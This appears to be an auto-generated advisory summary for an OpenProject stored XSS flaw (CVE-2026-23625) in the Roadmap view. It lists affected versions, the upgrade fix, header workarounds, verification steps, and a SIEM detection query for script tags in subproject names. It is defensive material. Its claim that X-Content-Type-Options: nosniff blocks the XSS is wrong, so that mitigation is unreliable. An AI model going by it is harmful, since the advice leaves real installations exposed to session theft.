CVE-2026-23625
📋 TL;DR
OpenProject versions 16.3.0 through 16.6.4 have a stored cross-site scripting vulnerability in the Roadmap view that allows attackers to inject malicious HTML/JavaScript via subproject names. This affects all users of affected OpenProject installations, potentially compromising user sessions and data. The vulnerability is mitigated by proper content security headers that were missing due to a configuration change.
💻 Affected Systems
- OpenProject
📦 What is this software?
Openproject by Openproject
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, perform actions as authenticated users, redirect to malicious sites, or install malware on user systems through client-side attacks.
Likely Case
Session hijacking, credential theft, and unauthorized actions performed in the context of authenticated users who view the Roadmap.
If Mitigated
With proper X-Content-Type-Options header, modern browsers will block script execution, preventing most exploitation attempts.
🎯 Exploit Status
Exploitation requires ability to create/modify subproject names and for victims to view the Roadmap. The vulnerability is stored XSS, making it persistent.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 16.6.5 or 17.0.0
Vendor Advisory: https://github.com/opf/openproject/security/advisories/GHSA-cvpq-cc56-gwxx
Restart Required: Yes
Instructions:
1. Backup your OpenProject installation and database. 2. Upgrade to OpenProject 16.6.5 or 17.0.0 using your package manager or manual installation. 3. Restart the OpenProject service. 4. Verify the X-Content-Type-Options: nosniff header is present in responses.
🔧 Temporary Workarounds
Add X-Content-Type-Options Header via Proxy
allConfigure your web server or reverse proxy to add X-Content-Type-Options: nosniff header to all OpenProject responses.
# For nginx: add 'add_header X-Content-Type-Options nosniff;' to server block
# For Apache: add 'Header set X-Content-Type-Options nosniff' to config
🧯 If You Can't Patch
- Restrict access to Roadmap view to trusted users only
- Audit and sanitize all subproject names for HTML/script content
🔍 How to Verify
Check if Vulnerable:
Check if OpenProject version is between 16.3.0 and 16.6.4 inclusive, and verify Roadmap view renders subproject names without HTML escaping.Check Version:
Check OpenProject admin interface or run: openproject run bundle exec rails runner 'puts OpenProject::VERSION.to_s'Verify Fix Applied:
Verify version is 16.6.5 or higher, and check HTTP responses contain X-Content-Type-Options: nosniff header.📡 Detection & Monitoring
Log Indicators:
- Unusual subproject name creation/modification containing HTML/script tags
- Multiple failed authentication attempts following Roadmap view access
Network Indicators:
- HTTP requests to external domains from OpenProject Roadmap pages
- Unexpected JavaScript execution in Roadmap context
SIEM Query:
source="openproject" AND (event="project_update" AND name=~"<.*>") OR (event="page_view" AND path="/roadmap" AND referer=null)